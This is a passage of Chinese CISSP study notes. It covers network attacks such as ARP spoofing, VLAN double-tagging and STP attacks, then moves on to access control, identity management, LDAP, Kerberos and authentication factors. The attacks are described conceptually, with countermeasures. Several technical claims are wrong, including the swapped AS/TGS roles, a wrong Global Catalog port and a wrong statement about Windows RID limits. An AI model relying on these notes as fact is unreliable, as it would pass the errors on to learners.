使用加密,从而增加从网络通信中提取身份验证凭证的难度。 4.重放攻击 Replay Attacks 重放攻击是假冒攻击的一种,它可以利用通过偷听捕获的网络通信进行攻击。重放攻击企 —142— 图通过对系统重放被捕获的通信来重建通信会话。你可以使用一次性身份验证机制和序列化会 话身份标识来防范重放攻击。 5.修改攻击 Modification Attacks 能够更改被捕获的数据包,然后再将其放回到系统中。被修改的数据包被设计为能够避开 改良的身份验证机制和会话排序的限制。针对修改重放攻击的对策包括数字签名验证和数据包 校验和验证。 6.地址解析协议欺骗 Address Resolution Protocol Spoofing ARP 用于通过轮询使用系统的 IP 地址来发现该系统的 MAC 地址。对付 ARP 攻击的手段包 括:为关键系统定义静态的 ARP 映射,监控 ARP 缓存中的 MAC-TP 地址映射,或者使用 IDS 检 查系统通信中的异常以及 ARP 通信中的变化。 7. DNS 投毒、欺骗和劫持 DNS Poisoning, Spoofing, and Hijacking 详细的不想讲了,在第三域的 E.1 章节讲了。 8. 超链接欺骗 Hyperlink Spoofing 与 ARP 相关联的另一种攻击是超链接欺骗。这种类似于 DNS 欺骗的攻击用于将通信重定 向至欺诈系统或冒名系统,或者简单地将通信发送至预定目的地之外的任何地方。超链接欺骗 既可以采用 DNS 欺骗的形式,也可以只是简单地在发送给客户端的文档的 HTML 代码中修改超 链接 URL,因为大多数用户并不通过 DNS 验证 URL 中的域名,而是认定超链接是合法的并进 行点击,所以超链接欺骗攻击往往都会成功。 网络钓鱼(phishing)是另一种经常使用超链接欺骗的攻击。网络钓鱼意味着诱骗他人上 钩,从而获得信息。这种攻击可以采用很多形式,包括使用伪造的 URL。 9.泛洪 flooding attack 泛洪这个词一点都不好听,也不知道是谁在什么时候发明的,洪泛这个词是错的。泛洪就 是泛滥的意思,也有教材说泛洪是交换机和网桥使用的一种数据流传递技术,将某个接口收到 的数据流从该接口之外的所有接口发送出去。如果数据帧中的目的MAC地址不在MAC地址表中, 就要向所有端口转发,请示回应。泛洪攻击有以下几种: ①SYN 泛洪。利用 TCP 的三次握手机制,有两种:PING 包泛洪就是向目的大量 PING,死 亡之 PING;smurf 就是向网络发大量改了回应地址的 SYS 包,让主机(或僵尸网)都把响应包 发送给目的机。 ②DHCP 泛洪。 ③ARP 泛洪。 ④UDP 泛洪。 10.VLAN 攻击 下面给出针对 VLAN 在数据链路层的最常见的攻击: ①MAC 洪泛攻击:这是不典型的网络“攻击”,但会限制所有交换机和网桥的工作方式。 如果交换机的 ARP 地址映射表已满,地址不再被学习,则流量将被永久进行(来源口)端口泛洪 (portsflooding)。 ②802.1Q 和交换链路间协议(ISL)标记攻击:标记攻击允许在一个 VLAN 中的用户获得未 经授权的访问权限,来访问另一个 VLAN。例如,如果一个 Cisco 交换机端口被配置为动态中 —143— 继协议(DTP)收到了假 DTP 包,它可能成为一个中继端口,并接受另外一个 vlan 的流量。这通 常被称为“VLAN 泄漏”。这可以通过设置关闭所有非 DTP 信任端口进行防范,也可以通过简 单的配置指南或软件的升级来防范。 ③双封装 802.1q/nested VLAN 攻击:在交换机内,VLAN 号码和识别信息是放置在一个特 殊的扩展格式,允许转发路径保持端到端隔离 VLAN 不丢失任何信息。ISL 是 Cisco 专有技术, 在某种意义上是一个紧凑的扩展报头。一个 VLAN,没有明确对一个 802.1Q 链路相关的任何标 签。这个 VLAN 是隐式用于一个 802.1Q 端口收到的所有未标记的通信能力。这种能力是可取的, 因为它允许 802.lQ 端口能够与旧的 802.3 端口直接发送和接收数据流量。当双封装 802.1 Q 包注入到网络设备的 VLAN 是一个 TRUNK 的 native VLAN 时,这些数据包的 VLAN 标识不能从端 到端保存,这是因为 802.1Q TRUNK 总是通过剥离外层标签修改数据包。在外部标签去除后, 内部标签只有数据包的 VLAN 标识符。区此,采用两个不同的标签双封装数据包,流量可以跨 越 VLAN。 ④ARP 攻击:不说了。ARP 中毒或 ARP 欺骗还有中间人攻击什么的。 ⑤组播暴力攻击:这种攻击试图利用交换机的潜在漏洞,发起二层多播帧的风暴。正确的 行为应该是限制源 VLAN 的通信流量,不当的行为会泄露帧到其他 VLAN。 ⑥生成树攻击:另一种攻击,试图利用可能的交换机的弱点发起 STP 攻击。攻击需要在链 路上,嗅探得到 STP 帧,得到端口上开启的 STP ID,然后,攻击者会发送 STP 的配置/拓扑变 化确认 BPDU,宣布他是一个很低的优先级的新根桥。 ⑦随机帧暴力攻击:这最后的攻击,可以有很多形式,但总的来说是蛮力攻击,随机变化 的一个或几个数据包字段,而保留了源地址和目的地址,等常数信息。 —144— 第五域 身份与访问管理 (访问控制与身份管理) Chapters 13,14 in OSG 7 th Chapters 3 in AIO 6 th A.控制资产的物理与逻辑访问 本节涉及的要访问的资产包括信息、系统、设备、设施、人员等一切有价值的东西,所以 考试大纲就按这些顺序列出了要点,但内容有点太离散了。后面的内容就是按访问控制的流程 来写的:标识=>验证=>授权=>访问=>问责。 访问 Access 就是存在主体 Subject(访问者)与客体 Object(对象)之间的信息流。 一、访问控制的类型 1.第一种分类(访问控制的 7 个主要类型): 第一域 I.6 章节就讲了访问控制的 7 个主要类型,即安全控制功能的分类: ①管理(Directive)/指引:指令性、强制性的规定,如:安全策略需求或标准、张贴通 告、疏散路线出口标志、监控、监督、工作任务过程。 ②威慑(Deterrent):旨在打击潜在的攻击者。吓唬人别搞坏事,如:策略、安全意识 培训、锁、围墙、安全标识、保安、陷阱、安全摄像机。 ③预防(Preventive):旨在避免发生事件。阻止非法进入,如:围墙、锁、生物测定学、 陷阱、灯光、警报系统、责任分离、工作轮换、数据分类、渗透测试、访问控制方法、加密、 审计、使用安全摄像机或闭路电视(CCTV)、智能卡、回叫、安全策略、安全意识培训、反病毒 软件、防火墙和入侵防御系统。 ④补偿(Compensating):提供可替代控制措施。增加访问控制措施,如:对 PII(个人 信息)加密。 ⑤检测(Detective)/监测:确认事件的活动和潜在的入侵者。发现非法进入,如:保安、 移动探测器、记录和检查安全摄像机或闭路电视捕获的事件(CCTV) 、工作轮换、强制休假、 审计跟踪、蜜罐或蜜网、IDS、违规报告、对用户的监管和检查、事故调查。 ⑥纠正(Corrective)/矫正:事件发生后,修复部件或系统。发生非法访问后,将系统 还原至正常的状态,如:终止恶意行为或重启系统、删除或隔离病毒。 ⑦恢复(Recovery):目的是使环境恢复正常运作。比纠正性控制更高级、更复杂,如: 备份和还原、容错驱动系统、系统镜像、服务器群集、反病毒软件以及虚拟机影像。 很多安全措施是同时符合以上多种类型的,如果问 CCTV 是预防、还是威慑、还是检测? 就要看题目中的场景了,它发挥的实际作用是什么就选最佳答案。 2.第二种分类: 管理性 Administrative。依照组织的安全策略和其它规则或需求,定义的策略与过程, 即管理控制,主要关注两个方面:人员与业务实践。例如:策略、过程、雇用准则、背景调查、 数据分类、安全意识和培训效果、报告与回顾、人员控制以及测试等。 技术性 Logical/technical。作为硬件或软件机制用于提供对这些资源和系统的保护,例 如:认证方式(例如密码、智能卡、生物测定学)、加密、受限接口、访问控制列表、协议、防 火墙、路由器、入侵检测系统以及阈值级别等。 —145— 物理性 Physical。包括部署以预防、监控或检测设施内的系统或区域直接接触的物理机 制。例如:保安、围墙、移动探测器、闭锁的门、密封窗、灯光、线缆保护、笔记本电脑锁、 徽章、磁条卡、看门狗、摄像机、陷阱以及报警器等。 3.第三种分类: 其实就是不同的访问控制模型,详见 E 章节。 DAC(Directionary):自主访控:自己管。 UDAC(Undirectionary):非自主访控:有系统管理员管。 MAC(Mandatory):强制访控:主客都有安全标签,必须严格管。 RBAC(Role-Base):基于角色访控:动态职责分离:在会话中限制权限。 rule-BAC:基于规则访控:很多规则。 ABAC(Attribute- Base)基于属性的访控。 A.1 信息 没内容。 A.2 系统 没内容。 A.3 设备 没内容。 A.4 设施 没内容。 B.管理人员与设备的身份和验证 B.1 实施身份管理 (例如:SSO,LDAP) 一、基础知识 1.有三个重要概念之间的关系要搞清楚: 访问控制的流程当中最重要的三个步骤要素:身份要唯一,认证要有效,授权要控制。 ①身份标识提供了唯一性(身份)。ID ②认证(验证)提供了有效性。Authentication/IDentification ③授权提供了控制。Authorization 身份验证通常包含 2 个步骤: ①输入公共信息(用户名、ID 号):身份标识步骤。 ②输入私有信息(密码、PIN 码):身份验证步骤。 —146— 创建和发布安全的合规的身份标识/帐户(ID),要满足 3 个关键条件或特性: ①唯一性。每个用户独一无二。 ②非描述性。ID 不能透露隐私或敏感信息(比如用户的职位信息)。 ③签发(安全发布)。ID 必须由权威机构签发和证明其真实有效。 2.有三个概念也要搞清楚: 这几个概念的考题很难。权限=操作__许可=(访问+权限)__特权=超级许可 *许可 Permissions。许可是指授予对一个对象的访问权并明确访问权的具体内容。有时 与权限的意思一样。(许可包括能否访问客体、对客体有什么权限 2 个要素) *权限 Rights。权限是指对一个对象采取行动的能力。例如,一个用户有权修改数据。(权 限就是针对客体的,不包括“访问”) *特权 Privileges。特权是权限和特权的综合。就是拥有一组多个最高权限的特别身份。 3.一个全面的身份管理解决方案包括以下技术: *密码管理;*帐户管理;*配置文件管理;*目录管理;*单点登录。 4.访问控制的流程: ①Idenfication=>Authentication=>Authorization=>Access=>Accountability 即:身份标识/识别==>身份验证/鉴别==>授权==>访问==>可问责性。 AAA 服务(Authentication、Authorization、Accountability)就是为了管控 Access。 这些在第一域第一章就讲过了。 二、密码管理 现代的大多数系统要求用户定期更改密码;为了防止暴力破解和 DDOS,多系统集成了密 码多次无效尝试后被锁定的功能。密码管理系统是用来统一管理在整个企业中的密码。 三、帐户管理 账户管理系统试图简化管理跨多个系统的用户身份。后面有专门讲账户管理的生命周期。 身份管理(Identity Management,IdM)是一个广泛而又深入的术语,包括使用不同产品对 —147— 用户进行自动化的身份标识、身份验证和授权。考试中 IDM 系统一般会涉及到目录服务中的“元 目录”和“虚拟目录”的内容;还会涉及到为了管理网络活动而增加的网络访问控制组件 WAM (Web access management component);还会涉及到 3 种不同的密码更新方式: ①密码同步 Password synchronization,为了减少复杂性,自动同步不同系统的密码。 ②自主修改 Self-service password reset,为了减少客服电话受理业务量,用户自己改。 ③辅助修改 Assisted password reset,为了减少客服实施操作工作量,先客服验证,再 让用户自己改。(一般有使用生物识别、令牌什么的) 1.这里讲下 SID 每个 Windows 用户,计算机或服务帐户具有唯一的字母数字标识符称为 SID。Willdows 安 全相关的处理,例如身份验证、授权和审计,使用唯一的 SID 来标识安全主体。由于 SID 是使 用在系统进程中,所以 SID 的格式对普通用户或管理员都不是很友好。AD 域帐户的 SID 是由 每个 Windows 域控制器(DC)运行一个域的安全权限创建的;本地帐户的 SID 是由每个 Windows 中运行的本地安全机构(LSA)服务创建。 2.举个例子 在测试活动目录(AD)系统中可分析得到一个 SID: S-I-5-21-4035617097-1094650281-2406268287-1981,其中: *S:初始的 S 标识,即代表该值为 SID 字符串。 *I:SID 的版本规范。到目前为止,从未改变,一直是 l。 *5:标识符权限值。这是顶级权威发布的一个预定义 SID 标识符。这通常是 5,它表示 SECURITY_NT_AUTHORlTY。 *21-4035617097-1094650281-2406268287:这部分是域或本地计算机的标识符,在本例中 它是一个域标识符。这是一个 SID 标识符创建的计算机或域的 48 位字符串。 *1981:这关联 ID(RID)是该 SID 的最后一部分。这 RID 可以用来唯一标识一种安全结构, 这种结构与一定范围的安全授权有关,而这种安全授权产生了 SID。在 Windows 操作系统中, 任何组或用户不能创建 RID 为 1000 或者更高的级别。 3.SID 唯一性 SID 的一个重要性质是其在时间和地点的唯一性。域安全机构作为跟踪的所有 SID 的颁发 和吊销机构,不会允许 SID 被重用。 4.公共的 SID 公共的 SID 是一组通用用户或通用组的 SID 标识。它们的值在所有操作系统保持不变。以 下是著名的 SID: ①SID:S-1-5-21domain-500 名称:管理员 描述:系统管理员的用户帐户。默认情况下,它是给予完全控制系统权限的用户帐户。 ②SID:S-1-5-21domain-501 名称:访客/来宾 描述:临时的、不需要密码的用户帐户。默认情况下,Guest 帐户被禁用。 —148— ③SID:S-1-5-21domain-512 名称:域管理员 描述:授权管理域中的所有成员。默认情况下,域管理员组是已经如入到域并包括域控制 器的所有计算机上 Adrninístrators 组的成员。域管理员组在默认情况下是可以创建的任何对 象和任何成员的组。 基于上面列出的公共的 SID/RID 组合,我们可以知道,RID 为 500 的是系统内置的管理员 帐户。这是有价值的信息,可以确定帐户是否被重命名混淆和确认其真实身份。同样,一个黑 客可能去尝试确定一个帐户的真实身份。 四、配置文件管理 配置文件是与特定身份或组相关联的信息集合。除了用户 ID 和密码,用户配置文件可能 包括个人信息,如姓名、电话号码、电子邮件地址、家庭地址,出生日期等。配置文件还可以 包含在特定系统上特权和权利有关的信息。然而,任何用户的特定信息会随着时间的变化而变 化,管理该变更过程是一个整体的身份管理中的一个重要组成部分。 当必须改变一个配置文件时,这个过程应易于管理并自动传播到关键的系统,如企业目录, 和个人系统。大多数客户关系管理(CRM)系统包括使用一些工具来管理用户配置文件,可以是 行政或通过自助服务方式。访问管理系统和密码管理系统中也可以实现这个功能。它有助于让 用户输入和管理个人不敏感的部分新数据而不需要验证。这有助于减少实施这些改变的成本和 时间,并提高准确性。 五、目录管理 集中式的访问控制系统,需要使用目录服务,它是一个集中的数据库,包含了主客体信息。 公司的目录是一个集中管理与公司有关实体的各种各样数据的综合数据库,如用户、组、系统、 服务器和打印机等对象的层次结构信息。目录服务的主要好处是,它是集中收集用户数据,可 以由许多应用程序使用,可以避免信息复制并简化用户数据。最常用的目录协议是轻量级目录 访问协议(LDAP),其它的还有 Novell NetWare 目录服务 NDS(NetWare Directory Service) 和 Microsoft 活动目录域服务(ADDS)。 目录服务就是一个为了快速读取和搜索的数据库软件,目录服务与数据库的区别: ①目录一般只执行简单的更新操作,适合于进行大量数据的检索,不支持批量更新。 ②目录具有广泛复制信息的能力,从而在缩短响应时间的同时,提高了可用性和可靠性。 要搞清楚什么是元目录,什么是虚拟目录: ①元目录(meta-directories):在中央目录中存储的必要信息,有统一视图,并定期同步; ②虚拟目录(virtual directories):与元目录类似,区别在于元目录的目录中含有真实 数据,而虚拟目录没有,虚拟目录只是指向实际的数据库。 1. X.500 X.500 系列通信协议是由国际电信联盟(ITU-T)在 90 年代初开发,最初被称为 ISO/IEC 9594-1:2008,现在是 ISO/IEC 9594-1:2014。它由四个不同的协议组成: ①目录访问协议(DAP),主协议; —149— ②目录系统协议(DSP); ③目录信息屏蔽协议(DISP); ④目录操作绑定管理协议(DOP)。 信息在 X.500 目录中被组织成一个层次数据库,所有资源的都有一个专有名称/可区分名 (DN),它提供在 X.500 数据库中的完整路径,可以找到其中一个特定的条目。X.500 还支持 一个相对专有名称(RDN),它提供了一个特定项目的名称,而不附加完整路径的组件。目录 内的客体由目录服务管理。目录服务允许管理员配置和管理如何在网络中进行身份标识、身 份验证、授权和访问控制。目录内的客体通过名称空间标记和标识。 举个例子: 在 Windows 环境中进行登录时,你会登入一个域控制器(Domain Controller,DC),它的 数据库中具有一个层次化目录。这个数据库运行一个目录服务(Active Directory),活动目 录),该服务组织网络资源并执行用户访问控制功能。因此,一旦成功登入域控制器,根据活 动目录的配置,你就可以访问某些网络资源(如打印服务、文件服务棒、电子邮件服务器等)。 目录服务如何让这些实体保持有序运行呢?这就需要使用名称空间。每种目录服务都采用 某种方式标识和命名它们所管理的客体。在基于 X.500 标准的、由 LDAP 访问的数据库中,目 录服务为每个客体分配可区分名/专用名称(Distinguished Name, DN)。每个 DN 代表与某个客 体有关的一组属性,并且作为一个条目存入目录。 下面讲的术语是按 LDAP 的标准来的: ①DN 可区分名 Distinguished Name;是 LDAP 记录项的名字(唯一),每一个 LDAP 记录项 的 DN 是由两个部分组成的:相对 DN(RDN)和记录在 LDAP 目录中的位置,反正好多属性值。 DN 的读法和 DNS 主机名类似。 ②CN 通用名称 Common Name; ③DC 域组件 Domain Component; ④OU 组织单元 Organization Unit;用来表示公司内部的机构:销售部、财务部,等等。 ⑤RDN 相对专有名称;RDN 是 DN 中与目录树的结构无关的部分(没有路径)。在 LDAP 目 录中存储的记录项都要有一个名字,这个名字通常存在 CN(Common Name)这个属性里,作为 RDN 的基础。如果我把最喜欢吃的燕麦粥食谱存为一个记录,我就会用 CN=Oatmeal Deluxe 作 为记录项的 RDN。 DN=DC+CN+OU,RDN=CN。 —150— 2.轻量级目录访问协议(LDAP) Lightweight Directory Access Protocol/最重要 与 X.500 不同,LDAP 支持 TCP/IP。许多目录服务建立在轻量级目录访问协议(LDAP)基础 上。例如,Microsoft 动态目录域服务就是以 LDAP 为基础的。公钥基础设施(PKI)用于管理 和传输数字证书,它就要使用 LDAP,LDAP 也用于实现单点登录功能。下面讲的密钥管理中心 (KDC)也要用到 LDAP。 LDAP 是各种网络服务、主体、客体和资产的名录清单。用户、客户和流程可以搜索目录 服务找到所需系统或资源存储的地方。访问控制系统经常会用到多个域和信任关系。安全域是 主客体的集合,共用一个安全策略,单个域可以独立于其他域单独操作。信任是域和域之间所 建立的安全桥梁,允许用户从一个域访问另一个域中的资源。 LDAP 使用分层树结构的目录条目。与 X.500 一样,LDAP 条目支持 DN 和 RDN 概念。DN 属 是一个实体的 DN 名称,RDN 只有名称不包含路径。数据库中的每个条目具有一系列名称/值对, 来表示与每个条目相关联的各种属性。LDAP 条目的常见属性包括(具体见上面的图和示例): ①DN 可区分名;②CN 通用名称;③DC 域组件;④OU 组织单元;⑤RDN 相对专有名称 —151— LDAP 使用 C/S(客户机/服务器)体系结构,客户端发出请求访问 LDAP 服务器,服务器将 响应请求的结果返回到客户机。LDAP 使用 TCP 端口 389 进行通信。如果需要高等级的安全, 第三版的 LDAP 协议支持使用 TLS 加密通信(636 端口)。全局编录服务器使用 TCP 3238 端口 (不加密)、3269 端口(加密)。 3.活动目录域服务(ADDS) 活动目录域服务,通常被称为 AD 域或 ADDS,是 LDAP 协议基于 Microsoft 环境的实现。 通过使用附加的插件服务,LDAP 目录可以通过许多其他系统,包括 UNIX,Linux 和甚至大型机 环境中使用。ADDS 提供了在一个企业范围的用户和系统服务中心的认证和授权功能。ADDS 有 能力实现强制执行组织的安全和跨企业配置策略。 ADDS 在命名结构上使用了 LDAP。与 LDAP 一样,ADDS 使用层次框架的一种体系来存储信 息。ADDS 目录被组织成树和森林。森林是所有的对象及其关联属性的集合,树是一个或多个 增加了一个森林内的安全域逻辑分组。域在 ADDS 是他们的 DNS 名称标识。在 ADDS 数据库的对 象由组织单位分组。 4. X.400 X.400 协议支持两个主要的功能:消息传输和消息存储。X.400 的地址包含一系列用分号 分隔的名称/值对。 一个典型的地址组件包含: 组织名称(O);组织单元名称(OU);指定名称(G);缩写(I);姓(S);国家名(C)。 下面重点讲单点登陆 六、单点登录 Single Sign-On 单点登录(SSO)是一种集中式访问控制技术,允许一个主体只在系统上认证一次并且可以 不用认证身份而访问多个资源。但是,一旦账户被破解,那么恶意主体就会拥有不受限制的访 问权限。常用的单点技术有: *基于脚本的单点登陆:代替用户与应用进行交互,去登陆其它系统。堡垒机就用的这个。 *Kerberos:由 KDC 来发“票”,对称加密。 *SESAME:要用到特权证书 Privileged Attribute Certificates (PACs)和鉴权服务 Privileged Attribute Server (PAS)。 *Security domains:主、客体都在同一密级的域时里,不存在越权了。 *Directory services:所有资源按标准进行命名。 *Thin clients:客户端搞定。 1. Kerberos(希腊神话里的 3 头看门狗)(必考) 这是麻省理工大学开发的身份验证技术,在 UNIX、WINDOWS、LINUX、MAC OS 等操作系统 都使用了,是开放的免费的协议,具有保护网络的三个要素:身份验证,授权和审计(AAA)。 它采用第三方实体来验证身份,是 C/S 架构(客户端/服务器),提供单点登录解决方案,可 以用在单机登录、本地 LAN、远程访问等。现在的 Kerboros 5 版本依赖的是对称密钥加密的 高级加密标准(AES)协议,使用端对端安全机制保障认证通信的机密性和完整性,有助于预防 窃听和重放攻击。它的体系包括几个重要元素:(如果不理解这些要素,先看看 Kerboros 的 —152— 认证流程就好) Kerberos 用的是 KDC,另外有一个技术是 PKI,用到了 CA、RA 什么的,这里不讲了,都 学完了建议联系起来理解。 ①委托人 principal(主体/客体) 任何主体(用户、应用程序)和任何客体(数据、文件)都是委托人,委托人之间的访问 信任必须通过 KDC 来建立,整个系统只是 KDC 是完全可靠可信的;客体接不接受你的访问,全 看你有没有 KDC 给你的“票”,没票免谈。 为了安全、方便的保存和使用那么多委托人的账户数据,就需要所谓的“目录访问服务” 了,即账户数据库。那么多的不同部门、不同系统的委托人,一般会分组来管理,这就是所谓 的域了(realm);KDC 可以对多个不同的域提供身份认证服务。 强调一下,每个委托人都必须安装 Kerboros 的客户端软件的,不然无法实现与 KDC 的验 证,而且那个所谓的每个委托人与 KDC 之间的唯一的“对称密钥”是由这个客户端和 KDC 同步 生成的。 ②密钥分发中心 The key distribution center (KDC) KDC 是提供身份认证服务的可信第三方。所有委托人(用户和服务)都在 KDC 做了注册, 并由 KDC 维持一个属于该委托人的密钥(所谓的对称密码学)。委托人的身份通过这个密钥来 向 KDC 来验证(不需要发送真实的密码)。KDC 与委托人之间传输的只有密钥和票据。 ③Kerberos 身份认证服务器(TGS+AS)KDC=TGS+AS 身份认证服务器就是 KDC 的服务器,是 KDC 功能的实现,包括 2 个重要部分:票据授予服 务/票证发放服务器 TGS(ticket-granting service)和身份认证服务 AS(authentication servi)。TGS 也就是 KDC 服务器,发票的;AS 对票证真实性和实效性进行验证,验票的。 ④授予票证 ticket-granting ticket(TGT) TGT 是用户登录时,KDC 验证完自己身份后派发的一个根票据,相当于是委托人的“身份 证”,拿到 TGT 就证明我是有身份的人了(证明了我是我自己,我妈是我妈)。它被叫做“票 证授予的票证”,意思是要想被授予票证去访问某个资源,你得先有这个证才行。TGT 进行了 加密,包括一个对称密钥、一个过期时间和用户的 IP 地址;TGT 的有效期一般为几个小时; 主体在请求得到访问某个客体的票据时,先向 KDC 出示自己的 TGT。TGT 就相当于获得了“护 照”,而下面的 ST 就相当于去某国的“签证”。 ⑤票据 ticket(ST) 票据就是票,也有称为票证,还有的称为服务票据(ST)service ticket。是一个加密的信 息,是主体访问客体的唯一凭证,由 KDC 的 KGS 生成并发给主体,代表给主体被授予了访问某 个客体的权限。Kerberos 的票据有特定的寿命和使用参数,一旦票据到期,就得续期或者重 新申请。也就是说 KDC 给了你什么票,你就能去什么场,要想去很多场地,就要有很多票。 Kerberos 用户的登录过程(目的是证明自己,拿到 TGT): 1.用户向客户端输入用户名和密码。 2.客户端使用 AES 加密用户名,然后传输至 KDC。(AES 使用客户端的初始密钥)这个过 程其实也可以不加密,直接发送出去,并不影响安全。 3.KDC 的 AS 负责验证身份,它向账户数据库验证用户名。 —153— 4.用户名验证通过后,KDC 的 AS 生成一个对称密钥,再生成一个时间戳的授予票证(TGT), 并向账户数据库读出用户密码;然后用对称密钥加密 TGT,再使用用户密码的散列值来加密对 称密钥。 5.KDC 将加密的对称密钥和 TGT 传输给客户端。 6.客户端使用用户密码的散列值来解密对称密钥,用得到的对称密钥再解密 TGT。客户端 安装 TGT,一直使用至其期满。如果用户不知道自己的密码,就得不到对称密钥,也就得不到 TGT,而整个过程密码并不在网上传播,是通过散列认证的。 用户请求访问资源的过程(目的是获取授权,访问服务或数据): 1.客户端将 TGT 发送回 KDC,同时请求访问某个数据或服务。 2.KDC 验证 TGT 的有效性,对比查看其访问控制表,确认用户是否拥有所请求资源的访问 权限。 3.KDC 的 TGS 生成一个服务票据(ST),就是票据,然后发送至客户端。这个票据 ST 里 有这些信息:一是 TGS 生成的一个会话密钥,用于随后主体(客户端)与客体(服务)间建立 加密通信;这个会话密钥是加密后才发出来的,一个用主体的密钥加密,一个用客体的密钥加 密;此外,票据里还有 1 个身份验证器,包含这些信息:主体的身份标识(用户名)、IP、序 列号和时间戳。(注意,这第一个身份验证器不用发给主体,直接发给客体就好) 4.客户端得到票据,先解密出会话密钥,用后随后的通信加密;再把自己的身份信息写入 票据,这样票据有了第 2 个身份验证器(身份验证信息都是用会话密钥加密的);最后把新的 票据发送给要访问的服务器或主机(客体)。 5.服务器或主机(客体)得到票据,先解密出会话密钥(如果能解密出来,说明这个票据 是可信的,是来源于 KDC 的,因为只有 KDC 知道它的密钥);然后用会话密钥解密分别来自主 体和 KDC 的 2 个身份验证器,如果是一样的,说明对方身份是正确的。 6.一旦票据被认证合法,Kerberos 的任务就完成了。用户客户端与服务器或主机随后建 立加密通信会话,开始数据传输。身份验证信息里的时间戳和序列号都可以防范重放攻击。 这里面的考点很多,其中秘密密钥是委托人与 KDC 之间用的,会话密钥是主体访问客体时 用的,两者都是 KDC 随机生成再分发的。 Kerberos 的缺点: ①存在单点故障。如果 KDC 被破解,所有系统的秘钥也都会被破解;如果 KOC 离线,那么 就无法完成身份认证过程。 ②有严格的时间要求。即所有的系统彼此要在五分钟内同步时间,如果一个系统不同步或 时间被改变了,以前发出的 TGT 将不再是有效的,系统将无法接收任何新的票据。实际上,客 户端将被拒绝访问任何受保护的网络资源。反正客户端必须要与 KDC 服务器的时间同步。 ③KDC 的性能要够好,能满足大量认证需求,并且是可扩展的,不然就跑不动了。 ④不加密通信流量。 ⑤其密码或密钥可能遭受暴力破解/蛮力攻击/字典攻击。 —154— 2.其它单点登陆的技术 ①欧洲安全多环境应用系统(SESAME) Secure European System for Applications in a Multivendor Environment 这是一个基于邀请的认证系统,其开发是为了解决 Kerberos 的缺点。不过,最终还是新 一代的 Kerberos 更好,SESAME 已经不再用了。SESAME 混合使用对称密钥和非对称密钥,而 Kerberos 只用了对称密钥。 Kerberos 通过使用票证来让主体通过客体的身份验证,而 SESAME 则使用特权属性证书 PAC(Privileged Attribute Certificate),PAC 包含主体的身份、对客体的访问能力、访问时 间段以及 PAC 的生命期。PAC 具有数字签名,因此客体能够确保其来自可信任的身份验证服务 器,这种服务器被称为特权属性服务器 PAS(privileged Attribute Server)。PAS 扮演与 Kerberos 内的 KDC 类似的角色。用户成功通过身份验证服务的身份验证之后就会得到一个要 提交给 PAS 的令牌。PAS 随后为用户生成一个 PAC ,该 PAC 用于提交给要访问的资源。 ②凭证库思想(Krypto Knight) 是 IBM 开发的一个基于邀请的认证系统。它与 Kerberos 相似,但是使用对等认证而非第 三方认证。KryptoKnight 被纳入 NetSP 产品。不过,SESAME、KryptoKnight 和 NetSP 从未 盛行,并再也不会被广泛使用。 这里讲的“基于邀请”是指“ticket-based”,就是基于“邀请函、请帖”,即“票”。 ③OAuth (意为公开认证)和 OpenID 是应用于网络单点登录的较新的例子。 OAuth 协议是一个开放标准,它与 HTTP 协作,允许用户以单一账户登录。例如,谷歌支 持 OAuth 2.0。 Open ID 也是一个开放标准,但是它由电脑软件公司 the OpenID Foundation 保持,并不 是 IETF RFC 标准。OpenID 可与 OAuth 共同使用,也可单独使用。 区别与联系: OAuth>OpenID;OpenID 是身份验证 Authentication;OAuth 是授权 Authorization。 —155— 前者是网站对用户进行认证,让网站知道“你是你所声称的 URL 的属主”;后者其实并不 包括认证,只不过“只有认证成功的人才能进行授权”,结果类似于“认证+授权”了。OAuth 相当于:A 网站给 B 网站一个令牌,然后告诉 B 网站说根据这个令牌你可以获取到某用户在 A 网站上允许你访问的所有信息。 3.集中式单点登录系统的缺点 ①用户的凭证都是由一个密码保护,如果有人破解了,那么攻击者就能访问整个系统中所 有应用的权限。 ②所有的用户凭证和身份验证信息都存储在一个数据库中,系统需要实施强大的监控和检 测,以确保任何问题都捕获并尽快处理。 B.2 单/多因素认证(例如: 因素、强度、错误、生物识别) 主体是活动的实体,它通过访问被动客体去获得客体的信息或数据。主体可以是用户、程 序、进程、文件、计算机或者去访问资源的任何东西。当通过授权,主体就可以修改客体。客 体客体是提供信息给话动主体的被动实体。客体可以是文件、数据库、计算机、程序、进程、 打印机和存储介质等。通常用“用户”一词代替主体,用“文件”一词代替客体。 1.认证因素 Authentication Factors 一般严格的身份验证多是多因素的,需要几个东西一起来证明身份。认证因素主要有 4 类: ①类型 1:Know 你知道什么?消息验证。例如:密码、个人标识码(PIN)或密码短语。 ②类型 2:Have 有拥有什么?所有权验证。例如:智能卡、硬令牌、记忆卡和 USB 驱动器。 智能卡和记忆卡之间的主要差异是:智能卡有处理数据的能力,而记忆卡只用于存储信息。 ③类型 3:Who 你是什么?特征验证。指某个身体部分或人的物理特征,例如:指纹、语 音、波纹、视网膜、虹膜、脸、掌纹和手型等;当然还包括你做什么?如:签名和击键力度。 其实还有第 4 因素:你在哪里?地址验证。例如终端 IP、电话号码或国家等物理位置信 息,只有和其它因素联合使用时才会有效。 当使用两个相同的因素,系统的强度并不会超过只单独使用其中一个因素的系统强度。 2.密码 密码其实很好理解,弱密码强密码什么的,这里补充些别的内容。 ①密码短语 Password Phrases 比基本密码更有效的密码机制是密码短语,类似于密码字符的字符串,但对于用户具有独 特的意义。为了简化记忆,密码短语往往是修改过的自然语言语句。例如:“1 passed the CISSP exam”会被转换为这样的密码短语“IP@$$edTheCISSPEx@m”。密码短语难以被破解,还很容 易记住。 ②认知密码 Cognitive Passwords(考点) 认知密码是另一种密码机制,通常是一系列问题,一般用做帐户的密保问题,例如:你的 生日是哪一天?你喜欢的运动是什么?等等。就像是找回密码时用的密保问题,但密保问题并不 是一个密码概念,更不是题目中的正确答案。有的地方也会出现基于知识的认证方法 Knowledge-based authentication,也用这种密保问题。 3.智能卡和令牌 Smartcards and Tokens —156— 智能卡和信息就是第二类认证因素:你拥有什么? ①智能卡 智能卡有多种形式,最新的智能卡包含一个微处理器和一个或多个证书。证书用于非对称 加密,比如加密数据或数字签名的电子邮件等。智能卡既可以进行身份识别,也可以进行身份 认证。但卡容易丢失,使用智能卡时大多会要求用户再设置另一个身份认证因素,如 PIN 码。 ②令牌 一次性密码 OTP(One-Time Password)也称为动态密码,用于身份验证,只能使用一次。 令牌和密码短信都是,现在金融网站都用软令牌了(通过短信,灵活方便自控)。 令牌或硬件令牌是一种密码生成设备,用户可以随身携带,网上银行用的特别多,形式也 